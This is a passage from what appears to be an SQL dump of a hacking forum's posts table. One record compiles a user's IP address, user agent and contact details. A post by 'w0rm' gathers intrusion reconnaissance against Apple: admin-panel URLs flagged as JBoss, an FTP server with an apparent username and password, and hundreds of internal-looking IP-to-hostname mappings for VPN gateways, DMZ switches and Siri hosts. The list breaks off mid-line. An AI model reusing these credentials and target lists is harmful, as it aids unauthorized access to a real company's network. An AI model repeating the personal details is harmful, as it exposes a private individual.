malwinjabber@xmpp.jp\n[b]e-mail[/b]: malwinmail@gmail.com\n[b]Info[/b]: * Reverse engineering\r\n* Malware research\r\n* Cross Platform programming\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 194.85.161.2\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://malwin.com | malwin.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0); INSERT INTO `post` (`postid`, `threadid`, `parentid`, `username`, `userid`, `title`, `dateline`, `pagetext`, `allowsmilie`, `showsignature`, `ipaddress`, `iconid`, `visible`, `attach`, `infraction`, `reportthreadid`) VALUES (1942, 1658, 0, 'w0rm', 1, '*.apple.', 1410023769, '_ttps://trainingadmin.apple.com/root/\n_ttps://trainingadmin.apple.com/root/status\nJBoss.\n_ttp://www.securitylab.ru/analytics/413450.php\n\n\n[URL]ftp://17.151.38.84[/URL]\n\nproappcustomer:media\n\n\n\nmx list [url]http://mxlist.net/mail-in6.apple.com/21[/url]\n\n[code]\n \n[LIST=1]\n[*]17.72.4.1 vl111.ie-dmz-sw1.euro.apple.com\n17.72.4.2 vl111.ie-dmz-sw2.euro.apple.com\n17.72.4.11 v05.ie-dmz-sw1.euro.apple.com\n17.72.4.12 v05.ie-dmz-sw2.euro.apple.com\n17.72.5.1 vl110.ie-dmz-sw1.euro.apple.com\n17.72.5.2 vl110.ie-dmz-sw2.euro.apple.com\n17.72.5.10 vl1102.ie-choke-gw1.euro.apple.com\n17.72.5.11 v05.rtr1a-eu.euro.apple.com\n17.72.5.12 v05.rtr1b-eu.euro.apple.com\n17.72.5.13 v05.rtr2a-eu.euro.apple.com\n17.72.5.14 v05.rtr2b-eu.euro.apple.com\n17.72.6.5 vl701.ie-choke-gw1.euro.apple.com\n17.72.6.6 vl701.ie-choke-gw2.euro.apple.com\n17.72.128.2 v128.ie-dmz-sw1.euro.apple.com\n17.72.128.51 ieork1-asavpn-fw1.euro.apple.com\n17.72.128.52 crk-asa-vpn.euro.apple.com\n17.72.129.33 xvpn1.euro.apple.com\n17.72.129.34 xvpn2.euro.apple.com\n17.72.129.36 cvpn.euro.apple.com\n17.72.129.37 svpn-u.euro.apple.com\n17.72.129.41 vpn.euro.apple.com\n17.72.129.42 vpn.euro.apple.com\n17.72.129.44 vpn-saci.euro.apple.com\n17.72.129.45 crk-saci-vpn.euro.apple.com\n17.72.132.2 v132.ie-dmz-sw1.euro.apple.com\n17.72.132.3 v132.ie-dmz-sw2.euro.apple.com\n17.72.132.21 v132r.ie-dmz-lb.euro.apple.com\n17.72.132.22 v251r1.ie-dmz-lb1.euro.apple.com\n17.72.132.23 v251r2.ie-dmz-lb2.euro.apple.com\n17.72.133.64 nserver.euro.apple.com\n17.72.133.101 nserver-ib1.euro.apple.com\n17.72.133.102 nserver-ib1-ha.euro.apple.com\n17.72.133.103 nserver-ib2.euro.apple.com\n17.72.133.104 nserver-ib2-ha.euro.apple.com\n17.72.134.75 vahalla.emagic.de\n17.72.136.2 v136.ie-dmz-sw1.euro.apple.com\n17.72.136.3 v136.ie-dmz-sw2.euro.apple.com\n17.72.140.2 v140.ie-dmz-sw1.euro.apple.com\n17.72.140.3 v140.ie-dmz-sw2.euro.apple.com\n17.72.144.34 avpn4-t.euro.apple.com\n17.72.144.35 avpn5-t.euro.apple.com\n17.72.144.54 lom-avpn4-t.euro.apple.com\n17.72.144.55 lom-avpn5-t.euro.apple.com\n17.72.251.21 v251v.ie-dmz-lb.euro.apple.com\n17.72.251.22 v251v1.ie-dmz-lb1.euro.apple.com\n17.72.251.23 v251v2.ie-dmz-lb2.euro.apple.com\n17.72.251.38 mail-in-vip.euro.apple.com\n17.72.251.39 mail-out-vip.euro.apple.com\n17.72.255.2 vl123.ie-dmz-sw1.euro.apple.com\n17.72.255.3 vl123.ie-dmz-sw2.euro.apple.com\n17.77.141.67 esltnb1.nlven.euro.apple.com\n17.77.141.68 eslti1.nlven.euro.apple.com\n17.77.141.139 eslmdc1.nlven.euro.apple.com\n17.77.141.140 eslmdc2.nlven.euro.apple.com\n17.77.141.141 eslpnb1.nlven.euro.apple.com\n17.77.141.142 eslpnb2.nlven.euro.apple.com\n17.77.141.143 eslpi1.nlven.euro.apple.com\n17.77.141.144 eslpi2.nlven.euro.apple.com\n17.77.141.145 eslpi3.nlven.euro.apple.com\n17.77.141.146 eslpi4.nlven.euro.apple.com\n17.77.141.147 eslpi5.nlven.euro.apple.com\n17.78.172.21 ilhfa1-asavpn-fw.euro.apple.com\n17.78.172.22 ilhfa1-asavpn-fw2.euro.apple.com\n17.78.197.102 ituneslive.euro.apple.com\n17.78.199.4 uklon5-asavpn-fw2.euro.apple.com\n17.78.199.5 emeia-aha-vpn.euro.apple.com\n17.78.199.195 stk-saci-vpn.euro.apple.com\n17.78.199.197 stk-saci-vpn.euro.apple.com\n17.78.231.4 nlams2-asavpn.euro.apple.com\n17.78.231.5 nlams2-asavpn-fw1.euro.apple.com\n17.80.150.11 vpn-oemcn-saci.asia.apple.com\n17.80.150.12 vpn-oemcn-saci.asia.apple.com\n17.80.150.21 oem-asa-vpn.asia.apple.com\n17.80.150.22 oem-asa-vpn.asia.apple.com\n17.80.152.10 vpn-sha-saci.asia.apple.com\n17.80.152.11 vpn-sha-saci.asia.apple.com\n17.82.200.7 mailv.asia.apple.com\n17.82.200.13 relay-xserve.asia.apple.com\n17.82.200.14 relay-xserve.asia.apple.com\n17.82.200.113 chervil.asia.apple.com\n17.82.208.11 sin-bz-asavpn1.asia.apple.com\n17.82.208.12 sin-bz-asavpn2.asia.apple.com\n17.82.242.252 sgna05a-vlan506.asia.apple.com\n17.82.254.2 nserver3.asia.apple.com\n17.82.254.3 nserver.asia.apple.com\n17.82.254.42 vpn-test.asia.apple.com\n17.82.255.4 vpn-sng-saci.asia.apple.com\n17.82.255.5 vpn-sng-saci.asia.apple.com\n17.82.255.131 sng-vpn1-ext.asia.apple.com\n17.82.255.132 sng-vpn2-ext.asia.apple.com\n17.82.255.133 sng-vpn3-ext.asia.apple.com\n17.82.255.134 webvpn.asia.apple.com\n17.82.255.135 sng-vpn4-ext.asia.apple.com\n17.82.255.138 sng-vpn7-ext.asia.apple.com\n17.83.255.11 jp-vpn.asia.apple.com\n17.83.255.12 jp-vpn.asia.apple.com\n17.83.255.130 jpn-ciscovpn-ext.asia.apple.com\n17.83.255.131 jpn-vpn1-ext.asia.apple.com\n17.83.255.132 jpn-vpn2-ext.asia.apple.com\n17.83.255.134 jpn-3vpn.asia.apple.com\n17.83.255.136 vpn-tok-saci.asia.apple.com\n17.86.254.25 listserv2.apple.com.au\n17.86.254.130 events.apple.com.au\n17.86.254.140 devfeeder.apple.com.au\n17.86.255.12 vpn-syd-saci.asia.apple.com\n17.86.255.13 vpn-syd-saci.asia.apple.com\n17.86.255.130 aus-vpn4-ext.asia.apple.com\n17.86.255.131 aus-vpn1.asia.apple.com\n17.86.255.132 vpn-syd.asia.apple.com\n17.86.255.135 aus-vpn.asia.apple.com\n17.86.255.136 syd-bz-asavpn2.asia.apple.com\n17.104.239.36 aus1-vpn-asa-1.apple.com\n17.104.239.37 aus1-vpn-asa-2.apple.com\n17.104.239.38 ivpn-aus.apple.com\n17.104.248.170 ausvr1-vpn-asa.apple.com\n17.112.87.4 egd-bz-nslbxprovisioning-uat.apple.com\n17.112.87.10 egd-bz-nslbxprovisioning.apple.com\n17.112.128.32 vpn-eg-x0.apple.com\n17.112.128.33 vpn-eg-x1.apple.com\n17.112.128.34 vpn-eg-x2.apple.com\n17.112.128.35 vpn-eg-x3.apple.com\n17.112.128.36 vpn-eg-x4.apple.com\n17.112.128.37 vpn-eg-x5.apple.com\n17.112.129.14 egd-bz-p27-asavpn14.apple.com\n17.112.129.15 egd-bz-p27-asavpn15.apple.com\n17.112.129.28 egd-p23-vpn.apple.com\n17.112.129.37 vpn-eg-3k.apple.com\n17.112.129.38 applevpn-eg.apple.com\n17.112.129.39 avpn-eg1.apple.com\n17.112.129.249 egd-bz-p27-asavpn3.apple.com\n17.112.129.250 egd-bz-p27-asavpn4.apple.com\n17.112.129.251 egd-bz-p23-asavpn5.apple.com\n17.112.129.252 egd-bz-p23-asavpn1.apple.com\n17.112.129.253 egd-bz-p23-asavpn2.apple.com\n17.112.129.254 egd-bz-p23-asavpn.apple.com\n17.112.136.1 fwsm-gateway-vlan510.apple.com\n17.112.144.54 nserver3-old.apple.com\n17.112.144.55 nserver4-old.apple.com\n17.112.144.59 nserver4.apple.com\n17.112.144.78 saciat-vpn.apple.com\n17.112.144.79 saciat-vpn.apple.com\n17.112.144.141 verify-alt.apple.com\n17.112.144.143 fdeserver-eg.apple.com\n17.112.146.106 appledirectory-dev.apple.com\n17.112.147.49 karchive.info.apple.com\n17.112.147.100 movies01.info.apple.com\n17.112.147.101 movies02.info.apple.com\n17.112.147.112 movies03.info.apple.com\n17.112.147.113 movies04.info.apple.com\n17.112.147.130 privatediscussions.info.apple.com\n17.112.147.224 alacsvc.info.apple.com\n17.112.147.226 mexsvc.info.apple.com\n17.112.152.35 livepage.apple.com\n17.112.152.74 dev-fmdl.filemaker.com\n17.112.168.14 rsvp-at-old.apple.com\n17.112.168.29 iaprvut.apple.com\n17.112.168.36 webgdv-at.apple.com\n17.112.168.59 webgdv-m.apple.com\n17.112.168.64 webgdvtws.apple.com\n17.112.168.86 selfservice-uat.apple.com\n17.112.168.94 ireservet.apple.com\n17.112.168.112 privromewebt.apple.com\n17.112.168.128 webgdvitws.apple.com\n17.112.168.137 developert.apple.com\n17.112.168.147 developertest.apple.com\n17.112.168.187 privftpuat.apple.com\n17.112.168.196 itntrvlt-ws1.apple.com\n17.112.168.197 itntrvlt-ws2.apple.com\n17.112.168.199 itntrvlt.apple.com\n17.112.168.251 rsvp-t-old.apple.com\n17.112.169.37 reservet-cn-old.apple.com\n17.112.169.43 webgdvat01.apple.com\n17.112.169.44 webgdvat02.apple.com\n17.112.169.89 webgdv1-m.apple.com\n17.112.169.90 webgdv2-m.apple.com\n17.112.169.133 reservet-hk-old.apple.com\n17.112.169.140 iaprvext-uat-eg-old.apple.com\n17.112.169.141 iaprvext-uat3-eg-old.apple.com\n17.112.169.142 iaprvext-uat4-eg-old.apple.com\n17.112.169.167 sswsdev.apple.com\n17.112.170.156 developertest-ws1.apple.com\n17.112.170.157 developertest-ws2.apple.com\n17.112.171.86 privftpdev-old.apple.com\n17.112.224.5 privftpuat-old.apple.com\n17.128.100.139 scv1.apple.com\n17.128.113.31 scv.apple.com\n17.128.115.100 scv-postino.apple.com\n17.128.115.180 scv-postino.apple.com\n17.128.115.182 foxglove.apple.com\n17.129.100.139 scv2.apple.com\n17.129.200.139 scv3.apple.com\n17.130.4.10 mu21p01sa-vc001.siri.apple.com\n17.136.226.10 minint-dndaj1v.siri.apple.com\n17.136.226.13 minint-276rcvc.siri.apple.com\n17.136.226.20 minint-7ke1vh6.siri.apple.com\n17.136.226.21 minint-hqvggbh.siri.apple.com\n17.136.226.23 minint-sa9vk2i.siri.apple.com\n17.136.226.24 minint-515l9vi.siri.apple.com\n17.136.226.25 minint-tr1g9vg.siri.apple.com\n17.136.226.28 minint-68gvpsj.siri.apple.com\n17.136.226.31 minint-hvfhrtr.siri.apple.com\n17.139.0.10 pv11p01sa-vc001.siri.apple.com\n17.139.8.10 pv11p02sa-vc001.siri.apple.com\n17.140.24.5 pv11p01sa.apple.com\n17.140.24.7 pv11p01sa-q01.siri.apple.com\n17.140.24.10 pv11p01sa-q04.siri.apple.com\n17.140.24.11 pv11p01sa-q05.siri.apple.com\n17.140.24.13 pv11p01sa-q07.siri.apple.com\n17.140.24.130 pv11p01sa-p01.apple.com\n17.140.24.132 pv11p01sa-q13.siri.apple.com\n17.140.24.133 pv11p01sa-sailfish.siri.apple.com\n17.140.25.27 pv11p02sa-p03.siri.apple.com\n17.140.25.29 pv11p02sa-p05.siri.apple.com\n17.140.25.32 pv11p02sa-p08.siri.apple.com\n17.140.25.131 pv11p02sa-p01.siri.apple.com\n17.140.25.132 pv11p02sa-p04.siri.apple.com\n17.140.25.133 pv11p02sa-p06.siri.apple.com\n17.140.25.136 pv11p02sa-p07.siri.apple.com\n17.140.25.138 pv11p02sa-p09.siri.apple.com\n17.140.25.139 pv11p02sa-q01.siri.apple.com\n17.140.25.140 pv11p02sa-q02.siri.apple.com\n17.140.25.141 pv11p02sa-sailfish.siri.apple.com\n17.140.26.5 pv11p03sa.apple.com\n17.140.26.6 pv11p03sa-sailfish.siri.apple.com\n17.140.27.5 pv11p04sa.apple.com\n17.140.27.8 pv11p04sa-sailfish.siri.apple.com\n17.142.132.7 pv-am-red.apple.com\n17.142.132.8 pv-apple-ca.apple.com\n17.142.132.9 pv-apple-jp.apple.com\n17.142.132.10 pv-applereg.apple.com\n17.142.132.11 pv-asia-red.apple.com\n17.142.132.12 pv-documentation.apple.com\n17.142.132.13 pv-documentation-gsa.apple.com\n17.142.132.14 pv-dotmacssti.apple.com\n17.142.132.15 pv-euro-prod-red.apple.com\n17.142.132.16 pv-euro-product.apple.com\n17.142.132.17 pv-euro-red.apple.com\n17.142.132.18 pv-extensions.apple.com\n17.142.132.19 pv-files.apple.com\n17.142.132.20 pv-genserv.apple.com\n17.142.132.21 pv-help.apple.com\n17.142.132.22 pv-helposx.apple.com\n17.142.132.23 pv-helpqt.apple.com\n17.142.132.24 pv-icloudstatus.apple.com\n17.142.132.25 pv-ink.apple.com\n17.142.132.26 pv-iphone-ld.apple.com\n17.142.132.27 pv-ipod-ca.apple.com\n17.142.132.28 pv-ipod.apple.com\n17.142.132.29 pv-itunes.apple.com\n17.142.132.30 pv-itunes-asia.apple.com\n17.142.132.31 pv-itunes-euro.apple.com\n17.142.132.32 pv-itunes-ca.apple.com\n17.142.132.33 pv-itunes-com.apple.com\n17.142.132.34 pv-livepage.apple.com\n17.142.132.36 pv-mp4.apple.com\n17.142.132.37 pv-neo-qtv.apple.com\n17.142.132.38 pv-nothingreal.apple.com\n17.142.132.39 pv-productred.apple.com\n17.142.132.40 pv-prohelp.apple.com\n17.142.132.41 pv-qtannounce.apple.com\n17.142.132.42 pv-qtinstall.apple.com\n17.142.132.43 pv-qtpix.apple.com\n17.142.132.44 pv-qtsoftware.apple.com\n17.142.132.45 pv-qttest.apple.com\n17.142.132.46 pv-rebate.apple.com\n17.142.132.47 pv-redirect.apple.com\n17.142.132.48 pv-rss.itunes.apple.com\n17.142.132.49 pv-searchcgi.apple.com\n17.142.132.50 pv-shake.apple.com\n17.142.132.51 pv-ssl-apple.apple.com\n17.142.132.52 pv-stream.qtv.apple.com\n17.142.132.53 pv-supgsa.apple.com\n17.142.132.54 pv-trailers.apple.com\n17.142.132.55 pv-tunes.apple.com\n17.142.132.56 pv-wsidecar.apple.com\n17.142.132.58 pv-www.apple.com\n17.142.132.59 pv-apple-com.apple.com\n17.142.132.60 pv-trackingshipment.apple.com\n17.142.132.61 pv-captive-redirect.apple.com\n17.142.132.62 pv-itunesradio-com.apple.com\n17.142.132.250 pv-www-backup.apple.com\n17.144.120.10 nk32p01sa-vc001.siri.apple.com\n17.144.184.10 nk33p01sa-vc001.siri.apple.com\n17.146.6.10 serverstatus.apple.com\n17.147.16.21 nk21l01sa-vc001.siri.apple.com\n17.149.0.83 appletv.fr\n17.149.0.157 nwk-silverscreen01.apple.com\n17.149.64.34 iphone-services-ls-nwk.apple.com\n17.149.160.19 nwk-stream.qtv.apple.com\n17.149.160.27 livepage.apple.com\n17.149.160.48 nwk-neo.qtv.apple.com\n17.149.160.64 silverscreen.apple.com\n17.149.160.66 itunes12daysofgifts.vn\n17.149.160.86 genserv.apple.com\n17.149.182.20 printservices.apple.com\n17.149.182.21 printservices-download-origin.apple.com\n17.149.182.24 nwk-geneva-upload.apple.com\n17.149.182.25 nwk-geneva-download.apple.com\n17.149.240.71 nwk-2gactivation.apple.com\n17.149.241.232 nwk2-carrier-services.apple.com\n17.149.241.252 nwk-carrier-services.apple.com\n17.150.11.23 cnvpn.apple.com\n17.150.11.24 cnvpn.apple.com\n17.151.1.24 nwk-rover-ember01.apple.com\n17.151.1.26 nwk-rover-ember02.apple.com\n17.151.1.28 nwk-rover-ember03.apple.com\n17.151.8.12 nwk1-f19-avaya-ssg1.apple.com\n17.151.8.13 nwk1-f19-avaya-ssg2.apple.com\n17.151.20.26 volumeitunesprogramdownloadtool.apple.com\n17.151.20.51 remoteadvisor1.apple.com\n17.151.20.52 remoteadvisor2.apple.com\n17.151.20.53 remoteadvisor.apple.com\n17.151.20.147 trainingevents.apple.com\n17.151.20.171 radar-webservices.apple.com\n17.151.20.221 konaservice-ext.apple.com\n17.151.20.249 salesinventoryreporting.apple.com\n17.151.20.253 volumeitunesprogram-a.apple.com\n17.151.31.19 origin-selfsolve-bz.apple.com\n17.151.31.43 origin-helpviewer-bz.apple.com\n17.151.31.50 survey.apple.com\n17.151.31.74 origin-uq7n0f698c0e6-tmp-selfsolve.apple.com\n17.151.33.12 icalserver.apple.com\n17.151.38.84 privftp.apple.com\n17.151.47.23 iphone-reserve.apple.com\n17.151.47.25 reserve-old.apple.com\n17.151.47.31 selfsolve-new.apple.com\n17.151.47.32 jointventure.apple.com\n17.151.63.11 vpn-test1.apple.com\n17.151.63.12 vpn-test2.apple.com\n17.151.63.13 vpn-test3.apple.com\n17.151.63.14 vpn-nwk-fs.apple.com\n17.151.63.17 vpn-cup-saci.apple.com\n17.151.63.18 vpn-cup-saci.apple.com\n17.151.63.19 vpn-cup-saci.apple.com\n17.151.63.21 vpn-cup-saci.apple.com\n17.151.63.22 vpn-cup-saci.apple.com\n17.151.63.23 vpn-cup-saci.apple.com\n17.151.63.24 vpn-cup-saci.apple.com\n17.151.63.25 vpn-cup-saci.apple.com\n17.151.63.26 vpn-cup-saci.apple.com\n17.151.63.27 vpn-cup-saci.apple.com\n17.151.63.30 vpn-cup-saci.apple.com\n17.151.63.34 nwk1-bz-3p-unvpn.apple.com\n17.151.63.39 vpn-cup-saci.apple.com\n17.151.63.40 vpn-cup-saci.apple.com\n17.151.63.41 ivpn.apple.com\n17.151.63.42 vpn.apple.com\n17.151.63.43 vpn-cup-saci.apple.com\n17.151.63.44 ivpn.apple.com\n17.151.63.45 ivpn.apple.com\n17.151.63.46 vpn.apple.com\n17.151.63.57 vpn-cup-saci.apple.com\n17.151.63.58 vpn-cup-saci.apple.com\n17.151.63.59 vpn-cup-saci.apple.com\n17.151.63.71 vpn-cup-saci.apple.com\n17.151.63.72 vpn-cup-saci.apple.com\n17.151.63.81 nwk1-g10-vpn.apple.com\n17.151.63.82 nwk1-g10-vpn.apple.com\n17.151.63.83 nwk1-g10-vpn.apple.com\n17.151.63.84 nwk1-g10-vpn.apple.com\n17.151.63.85 nwk1-g10-vpn-asa5.apple.com\n17.151.63.86 nwk1-g10-vpn-asa6.apple.com\n17.151.63.87 nwk1-g10-vpn-asa7.apple.com\n17.151.63.88 nwk1-g10-vpn-asa8.apple.com\n17.151.63.101 ivpn-nwk.apple.com\n17.151.63.103 idcvpn-nwk.apple.com\n17.151.63.201 nwk1-g10-dcvpn-asa1.apple.com\n17.151.63.202 nwk1-g10-dcvpn-asa2.apple.com\n17.151.63.203 nwk1-g10-dcvpn-asa3.apple.com\n17.151.63.204 nwk-secvpn.apple.com\n17.151.63.244 nwk1-bz-f19-asaivpn.apple.com\n17.151.63.245 nwk1-bz-f19-asavpn3.apple.com\n17.151.63.246 nwk1-bz-f19-asavpn4.apple.com\n17.151.63.247 nwk1-bz-f19-3pvpn1.apple.com\n17.151.63.248 nwk1-bz-f19-3pvpn2.apple.com\n17.151.63.249 nwk1-bz-f19-3pvpn.apple.com\n17.151.63.252 nwk1-bz-f19-asavpn1.apple.com\n17.151.63.253 nwk1-bz-f19-asavpn2.apple.com\n17.151.63.254 nwk1-bz-f19-asavpn.apple.com\n17.151.64.70 vpn-cup-ccert.apple.com\n17.151.135.10 developer2.apple.com\n17.151.140.29 developerx.apple.com\n17.151.140.30 developer.apple.com\n17.151.140.33 connect2-java-temp.apple.com\n17.151.140.34 rsvp-temp.apple.com\n17.151.140.35 developerns.apple.com\n17.151.140.38 developerservices2.apple.com\n17.151.140.246 devservices.apple.com\n17.151.140.247 developerm.apple.com\n17.151.140.248 developerweb.apple.com\n17.151.140.249 developerservices1.apple.com\n17.151.194.82 livid.apple.com\n17.151.224.68 nk20310001c.connectivity.icloud.com\n17.151.224.69 nk20710001c.connectivity.icloud.com\n17.151.224.70 nk20610001c.connectivity.icloud.com\n17.151.224.71 nk20210001c.connectivity.icloud.com\n17.151.224.72 nk20410001c.connectivity.icloud.com\n17.151.224.73 nk20810001c.connectivity.icloud.com\n17.151.224.74 nk20510001c.connectivity.icloud.com\n17.151.224.75 nk20110001c.connectivity.icloud.com\n17.151.224.76 p10-conduit.connectivity.icloud.com\n17.151.224.77 nk20310002c.connectivity.icloud.com\n17.151.224.78 nk20710002c.connectivity.icloud.com\n17.151.224.79 nk20610002c.connectivity.icloud.com\n17.151.224.80 nk20210002c.connectivity.icloud.com\n17.151.224.81 nk20410002c.connectivity.icloud.com\n17.151.224.82 nk20810002c.connectivity.icloud.com\n17.151.224.83 nk20510002c.connectivity.icloud.com\n17.151.224.90 nk20110002c.connectivity.icloud.com\n17.151.224.99 nk20310003c.connectivity.icloud.com\n17.151.224.100 nk20710003c.connectivity.icloud.com\n17.151.224.101 nk20610003c.connectivity.icloud.com\n17.151.224.102 nk20210003c.connectivity.icloud.com\n17.151.224.103 nk20410003c.connectivity.icloud.com\n17.151.224.104 nk20810003c.connectivity.icloud.com\n17.151.224.105 nk20510003c.connectivity.icloud.com\n17.151.224.106 nk20110003c.connectivity.icloud.com\n17.151.224.107 nk20310004c.connectivity.icloud.com\n17.151.224.108 nk20710004c.connectivity.icloud.com\n17.151.224.109 nk20610004c.connectivity.icloud.com\n17.151.224.110 nk20210004c.connectivity.icloud.com\n17.151.224.111 nk20410004c.connectivity.icloud.com\n17.151.224.112 nk20810004c.connectivity.icloud.com\n17.151.224.113 nk20510004c.connectivity.icloud.com\n17.151.224.114 nk20110004c.connectivity.icloud.com\n17.151.225.58 p12-conduit.connectivity.icloud.com\n17.151.225.79 nk20112001c.connectivity.icloud.com\n17.151.225.80 nk20112002c.connectivity.icloud.com\n17.151.225.81 nk20112003c.connectivity.icloud.com\n17.151.225.82 nk20112004c.connectivity.icloud.com\n17.151.225.83 nk20212001c.connectivity.icloud.com\n17.151.225.84 nk20212002c.connectivity.icloud.com\n17.151.225.85 nk20212003c.connectivity.icloud.com\n17.151.225.86 nk20212004c.connectivity.icloud.com\n17.151.225.87 nk20312001c.connectivity.icloud.com\n17.151.225.88 nk20312002c.connectivity.icloud.com\n17.151.225.89 nk20312003c.connectivity.icloud.com\n17.151.225.90 nk20312004c.connectivity.icloud.com\n17.151.225.91 nk20412001c.connectivity.icloud.com\n17.151.225.92 nk20412002c.connectivity.icloud.com\n17.151.225.93 nk20412003c.connectivity.icloud.com\n17.151.225.94 nk20412004c.connectivity.icloud.com\n17.151.225.95 nk20512001c.connectivity.icloud.com\n17.151.225.96 nk20512002c.connectivity.icloud.com\n17.151.225.97 nk20512003c.connectivity.icloud.com\n17.151.225.98 nk20512004c.connectivity.icloud.com\n17.151.225.99 nk20612001c.connectivity.icloud.com\n17.151.225.100 nk20612002c.connectivity.icloud.com\n17.151.225.101 nk20612003c.connectivity.icloud.com\n17.151.225.102 nk20612004c.connectivity.icloud.com\n17.151.225.103 nk20712001c.connectivity.icloud.com\n17.151.225.104 nk20712002c.connectivity.icloud.com\n17.151.225.105 nk20712003c.connectivity.icloud.com\n17.151.225.106 nk20712004c.connectivity.icloud.com\n17.151.225.107 nk20812001c.connectivity.icloud.com\n17.151.225.108 nk20812002c.connectivity.icloud.com\n17.151.225.109 nk20812003c.connectivity.icloud.com\n17.151.225.110 nk20812004c.connectivity.icloud.com\n17.151.226.13 p14-conduit.connectivity.icloud.com\n17.151.226.35 nk20114001c.connectivity.icloud.com\n17.151.226.36 nk20114002c.connectivity.icloud.com\n17.151.226.37 nk20114003c.connectivity.icloud.com\n17.151.226.38 nk20114004c.connectivity.icloud.com\n17.151.226.39 nk20214001c.connectivity.icloud.com\n17.151.226.40 nk20214002c.connectivity.icloud.com\n17.151.226.41 nk20214003c.connectivity.icloud.com\n17.151.226.42 nk20214004c.connectivity.icloud.com\n17.151.226.43 nk20314001c.connectivity.icloud.com\n17.151.226.44 nk20314002c.connectivity.icloud.com\n17.151.226.45 nk20314003c.connectivity.icloud.com\n17.151.226.46 nk20314004c.connectivity.icloud.com\n17.151.226.47 nk20414001c.connectivity.icloud.com\n17.151.226.48 nk20414002c.connectivity.icloud.com\n17.151.226.49 nk20414003c.connectivity.icloud.com\n17.151.226.50 nk20414004c.connectivity.icloud.com\n17.151.226.51 nk20514001c.connectivity.icloud.com\n17.151.226.52 nk20514002c.connectivity.icloud.com\n17.151.226.53 nk20514003c.connectivity.icloud.com\n17.151.226.54 nk20514004c.connectivity.icloud.com\n17.151.226.55 nk20614001c.connectivity.icloud.com\n17.151.226.56 nk20614002c.connectivity.icloud.com\n17.151.226.57 nk20614003c.connectivity.icloud.com\n17.151.226.58 nk20614004c.connectivity.icloud.com\n17.151.226.59 nk20714001c.connectivity.icloud.com\n17.151.226.60 nk20714002c.connectivity.icloud.com\n17.151.226.61 nk20714003c.connectivity.icloud.com\n17.151.226.62 nk20714004c.connectivity.icloud.com\n17.151.226.63 nk20814001c.connectivity.icloud.com\n17.151.226.64 nk20814002c.connectivity.icloud.com\n17.151.226.65 nk20814003c.connectivity.icloud.com\n17.151.226.66 nk20814004c.connectivity.icloud.com\n17.151.227.47 p16-conduit.connectivity.icloud.com\n17.151.227.48 nk20116001c.connectivity.icloud.com\n17.151.227.49 nk20116002c.connectivity.icloud.com\n17.151.227.50 nk20116003c.connectivity.icloud.com\n17.151.227.51 nk20116004c.connectivity.icloud.com\n17.151.227.52 nk20216001c.connectivity.icloud.com\n17.151.227.53 nk20216002c.connectivity.icloud.com\n17.151.227.54 nk20216003c.connectivity.icloud.com\n17.151.227.55 nk20216004c.connectivity.icloud.com\n17.151.227.56 nk20316001c.connectivity.icloud.com\n17.151.227.57 nk20316002c.connectivity.icloud.com\n17.151.227.58 nk20316003c.connectivity.icloud.com\n17.151.227.59 nk20316004c.connectivity.icloud.com\n17.151.227.60 nk20416001c.connectivity.icloud.com\n17.151.227.61 nk20416002c.connectivity.icloud.com\n17.151.227.62 nk20416003c.connectivity.icloud.com\n17.151.227.63 nk20416004c.connectivity.icloud.com\n17.151.227.64 nk20516001c.connectivity.icloud.com\n17.151.227.65 nk20516002c.connectivity.icloud.com\n17.151.227.66 nk20516003c.connectivity.icloud.com\n17.151.227.67 nk20516004c.connectivity.icloud.com\n17.151.227.68 nk20616001c.connectivity.icloud.com\n17.151.227.69 nk20616002c.connectivity.icloud.com\n17.151.227.70 nk20616003c.connectivity.icloud.com\n17.151.227.71 nk20616004c.connectivity.icloud.com\n17.151.227.72 nk20716001c.connectivity.icloud.com\n17.151.227.73 nk20716002c.connectivity.icloud.com\n17.151.227.74 nk20716003c.connectivity.icloud.com\n17.151.227.75 nk20716004c.connectivity.icloud.com\n17.151.227.76 nk20816001c.connectivity.icloud.com\n17.151.227.77 nk20816002c.connectivity.icloud.com\n17.151.227.78 nk20816003c.connectivity.icloud.com\n17.151.227.79 nk20816004c.connectivity.icloud.com\n17.151.236.54 p18-conduit.connectivity.icloud.com\n17.151.236.55 nk20118001c.connectivity.icloud.com\n17.151.236.56 nk20118002c.connectivity.icloud.com\n17.151.236.57 nk20118003c.connectivity.icloud.com\n17.151.236.58 nk20118004c.connectivity.icloud.com\n17.151.236.59 nk20218001c.connectivity.icloud.com\n17.151.236.60 nk20218002c.connectivity.icloud.com\n17.151.236.61 nk20218003c.connectivity.icloud.com\n17.151.236.62 nk20218004c.connectivity.icloud.com\n17.151.236.63 nk20318001c.connectivity.icloud.com\n17.151.236.64 nk20318002c.connectivity.icloud.com\n17.151.236.65 nk20318003c.connectivity.icloud.com\n17.151.236.66 nk20318004c.connectivity.icloud.com\n17.151.236.67 nk20418001c.connectivity.icloud.com\n17.151.236.68 nk20418002c.connectivity.icloud.com\n17.151.236.69 nk20418003c.connectivity.icloud.com\n17.151.236.70 nk20418004c.connectivity.icloud.com\n17.151.236.71 nk20518001c.connectivity.icloud.com\n17.151.236.72 nk20518002c.connectivity.icloud.com\n17.151.236.73 nk20518003c.connectivity.icloud.com\n17.151.236.74 nk20518004c.connectivity.icloud.com\n17.151.236.75 nk20618001c.connectivity.icloud.com\n17.151.236.76 nk20618002c.connectivity.icloud.com\n17.151.236.77 nk20618003c.connectivity.icloud.com\n17.151.236.78 nk20618004c.connectivity.icloud.com\n17.151.236.79 nk20718001c.connectivity.icloud.com\n17.151.236.80 nk20718002c.connectivity.icloud.com\n17.151.236.81 